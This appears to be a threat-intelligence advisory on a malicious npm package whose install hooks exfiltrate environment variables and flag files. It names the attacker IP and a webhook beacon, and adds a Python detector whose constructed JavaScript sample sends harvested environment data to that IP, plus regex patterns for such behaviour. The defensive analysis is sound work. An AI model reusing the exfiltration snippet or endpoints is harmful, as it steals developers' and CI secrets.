Supply-chain threat intelligence

Incident detail

critical · npm · credential theft · osv

Malicious code in ecto-corsair-flag-7kq3mz (npm)

ecto-corsair-flag-7kq3mz

Risk score

92

AI summary

Indexed incident for ecto-corsair-flag-7kq3mz (npm).

Description

Package wires preinstall, install, and postinstall lifecycle hooks to run postinstall.js, which executes unconditionally on npm install. The script collects hostname, cwd, uid, and environment variables matching FLAG/CTF/NPM/REGISTRY/CI/GITHUB/RUNNER, reads candidate flag files, and uses child_process.execSync to recursively grep installer-side directories (/app, /workspace, /challenge, /home/runner/work/repo/repo, ., .., ../..) for flag-shaped strings. The collected manifest is base64-encoded and PUT to http://154.57.164.76:30728/api/modules/, with an additional GET beacon to webhook.site/755defab-ea42-4c1f-9804-43ec567439f5. postinstall.js also tests npm_config_registry against /verdaccio/i to detect successful dependency-confusion landings, and the shipped publish-and-arm.sh and README self-describe the package as an 'armed' dependency-confusion probe. Regardless of the CTF/probe framing, installing this package causes unconsented exfiltration of installer environment and filesystem contents to an attacker-controlled IP.
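A triage check for the pattern this description lays out, added here as an example and not code from ThreatPkg or the advisory: it flags a package whose package.json wires lifecycle hooks to a script that combines shell execution, environment harvesting, base64 encoding and a hard-coded remote endpoint. The package.json and script below are constructed to mirror that pattern and are not the real package contents.

```python
import json
import re

# Constructed sample inputs modelled on the advisory's description
# (lifecycle hooks -> postinstall.js -> env harvest -> base64 -> PUT to an IP).
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-pkg",
    "version": "1.0.2",
    "scripts": {
        "preinstall": "node postinstall.js",
        "install": "node postinstall.js",
        "postinstall": "node postinstall.js",
    },
})
SAMPLE_SCRIPT = r'''
const { execSync } = require("child_process");
const env = Object.keys(process.env).filter(k => /FLAG|CTF|NPM|REGISTRY|CI|GITHUB|RUNNER/.test(k));
const body = Buffer.from(JSON.stringify({ env, h: require("os").hostname() })).toString("base64");
require("http").request({ host: "154.57.164.76", port: 30728, method: "PUT", path: "/api/modules/" }).end(body);
'''

# Hooks that run automatically on `npm install` without any user action.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Source-level signals; each alone is common, the combination is not.
SCRIPT_SIGNALS = {
    "spawns_shell": r"child_process|execSync\(",
    "harvests_env": r"process\.env",
    "encodes_payload": r"toString\(['\"]base64['\"]\)",
    "hardcoded_endpoint": r"https?://|host:\s*['\"]\d{1,3}(?:\.\d{1,3}){3}",
}

def find_lifecycle_hooks(package_json: str) -> dict:
    """Return the install-time hooks declared in package.json scripts."""
    scripts = json.loads(package_json).get("scripts", {})
    return {k: v for k, v in scripts.items() if k in LIFECYCLE_HOOKS}

def scan_script(source: str) -> list:
    """Return the names of SCRIPT_SIGNALS patterns present in the script."""
    return [name for name, pat in SCRIPT_SIGNALS.items() if re.search(pat, source)]

def assess(package_json: str, script_source: str) -> dict:
    """Combine hook wiring and script signals into a triage verdict."""
    hooks = find_lifecycle_hooks(package_json)
    signals = set(scan_script(script_source))
    if hooks and "hardcoded_endpoint" in signals and signals & {"harvests_env", "spawns_shell"}:
        verdict = "suspicious"   # auto-run hook that collects data and talks to a fixed remote
    elif hooks:
        verdict = "review"       # install-time hook, but no exfiltration pattern seen
    else:
        verdict = "clean"
    return {"hooks": hooks, "signals": sorted(signals), "verdict": verdict}
```

In a CI gate, `assess` would run against the tarball's package.json and every script referenced by a lifecycle hook before the package is allowed to install.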

Technical details

Affected versions

  • = 1.0.2
  • = 1.0.0
  • = 1.0.1

Indicators

  • affected version = 1.0.2 (75%)
  • affected version = 1.0.0 (75%)
  • affected version = 1.0.1 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents